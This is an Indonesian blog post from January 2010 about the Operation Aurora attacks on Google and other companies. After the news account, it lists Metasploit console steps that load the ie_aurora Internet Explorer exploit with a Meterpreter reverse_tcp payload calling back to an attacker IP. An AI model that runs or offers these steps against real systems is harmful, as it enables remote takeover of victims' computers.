Aurora IE Exploit dari Matasploit

Posted in January 19th, 2010 By PatchMe

Seperti yang diketahui, Beberapa waktu yang lalu Google dan beberapa puluh perusahaan amerika Diserang oleh Hacker (yang diduga dan diyakini benar berasal dari negeri china), Hacker ini mampu Mamasuki / mengakses Email para pekerja sosial di database Google, Dalam Pernyataan Resmi google, Serangan yang benar – benar terarah,rapi dan terorganisir ini memang menargetkan Perusahaan – perusahaan Besar. Namun google berkata mereka (hacker itu) hanya melihat sebagian kecil saja dari isi email tersebut.

iDefense sebagai salah satu Organisasi Keamanan(aka forensic), telah mengumumkan, kalau serangan ini setidaknya telah diluncurkan setidaknya beberapa bulan yang lalu. Namun Mereka juga belum berhasil/Berani menyimpulkan APA dan BAGAIMANA para hacker itu mampu melakukannya.

Usut Punya usut, Google, Adobe, Microsoft dan perusahaan amerika lainnya yang “merana” karena serangan ini akhirnya Berhasil menarik “sedikit” kesimpulan. Kalau para hacker itu kemungkinan mengakali para Pekerja atau staff dengan mengirimkan sebuah file berformat PDF, Namun bukan PDF biasa namun PDF yang sudah dimanipulasi sedemikian rupa dan di bungkus dengan Trojan Hydraq.

Trojan ini memanfaatkan 0day exploit, Jika ilustrasikan secara sederhana:
Sang Hacker mengirimkan email yang berformat PDF yang disusupi trojan ke karyawan target..
Si target Jika menggunakan OS Windows dengan IE didalamnya dan membuka lampiran attachment, maka si trojan langsung beraksi, tersembunyi,mengendap dan menunggu perintah tuannya (IP TAIWAN). Hari ini gw baca berita, kalau Pemerintah Amrik, Bakal Mempertanyakan hal ini secara resmi, mereka mau tanggapan dari pemerintah china tentang insiden ini.

|snap|

Beberapa hari yang lalu, Team Metasploit Framework Mendapatkan durian runtuh, Secara tidak sengaja mereka mendapat Publikasi 0day/POC unpatched Internet Explorer exploit yang di upload ke wepawet (Online analyser). dan itu artinya code tersedia buat publik..
hasilnya, Baru saja gw Melakukan update Database Metasploit dan..

aurora exploit

AURORA IE Exploit ternyata Sudah tersedia..  :twisted:

Step:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (IP Attacker)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

Gw sih blom nyoba juga, mungkin besok atau lusa mau di coba di kompi nya… gw sendiri :mrgreen:

by: PatchMe2

Dork:

ie_aurora -

Postingan yang berhubungan:

Filed under: Linux, News, Security, Windows Tags: , , , , , , ,








:wink: :-| :-x :twisted: :) 8-O :( :roll: :-P :oops: :-o :mrgreen: :lol: :idea: :-D :evil: :cry: 8) :arrow: :-? :?: :!: